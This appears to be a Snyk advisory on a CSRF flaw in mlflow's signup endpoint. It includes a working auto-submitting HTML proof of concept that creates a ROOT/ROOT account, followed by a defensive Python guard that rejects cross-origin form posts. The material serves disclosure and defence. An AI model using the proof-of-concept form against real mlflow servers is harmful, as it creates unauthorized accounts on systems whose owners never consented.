Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade mlflow to version 2.20.2 or higher.
mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) through the Signup feature. An attacker can create a new account, which may be used to perform unauthorized actions on behalf of the malicious user.
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF Attack</title>
</head>
<body onload="document.forms['csrfForm'].submit();">
  <form id="csrfForm" action="http://127.0.0.1:5000/api/2.0/mlflow/users/create" method="POST">
    <input type="hidden" name="username" value="ROOT">
    <input type="hidden" name="password" value="ROOT">
  </form>
</body>
</html>
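The request above reaches the server as a cross-origin, form-encoded POST. The following is an added example (not code from the advisory or from mlflow, and not mlflow's actual fix) of a server-side guard for a JSON API endpoint that rejects exactly that shape of request: state-changing calls must carry a JSON content type, which an HTML form cannot send, and must come from an allowlisted origin. The `Request` class and the sample requests are constructed stand-ins for a web framework's request object.

```python
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


@dataclass
class Request:
    """Minimal stand-in for a framework request (constructed for this example)."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def _header(req, name):
    """Case-insensitive header lookup."""
    return next((v for k, v in req.headers.items() if k.lower() == name.lower()), None)


def csrf_rejection_reason(req, allowed_origins):
    """Return None if the request may proceed, otherwise a short reason to reject it."""
    if req.method.upper() in SAFE_METHODS:
        return None
    # An HTML form can only send form-encoded or multipart bodies, never JSON.
    ctype = (_header(req, "Content-Type") or "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return "state-changing request must be application/json"
    # Modern browsers label cross-origin requests; treat sibling subdomains as untrusted too.
    fetch_site = (_header(req, "Sec-Fetch-Site") or "").lower()
    if fetch_site in ("cross-site", "same-site"):
        return f"Sec-Fetch-Site={fetch_site}"
    origin = _header(req, "Origin")
    if origin is None:
        # Fall back to Referer; some clients omit Origin on same-origin requests.
        referer = _header(req, "Referer")
        if referer is None:
            return "missing Origin and Referer"
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin.lower() not in {o.lower() for o in allowed_origins}:
        return f"Origin {origin} not allowed"
    return None


# Constructed sample: what the proof-of-concept form submission looks like server-side.
POC_FORM_POST = Request("POST", "/api/2.0/mlflow/users/create",
    {"Origin": "http://attacker.example", "Sec-Fetch-Site": "cross-site",
     "Content-Type": "application/x-www-form-urlencoded"})
# Constructed sample: a legitimate same-origin JSON call from the tracking server's UI.
LEGIT_JSON_POST = Request("POST", "/api/2.0/mlflow/users/create",
    {"Origin": "http://127.0.0.1:5000", "Sec-Fetch-Site": "same-origin",
     "Content-Type": "application/json"})
ALLOWED = ["http://127.0.0.1:5000"]
```

Wired into a framework's before-request hook, a non-None reason maps to a 403; the Referer fallback exists only for clients that omit Origin, and a request with neither header is rejected rather than trusted.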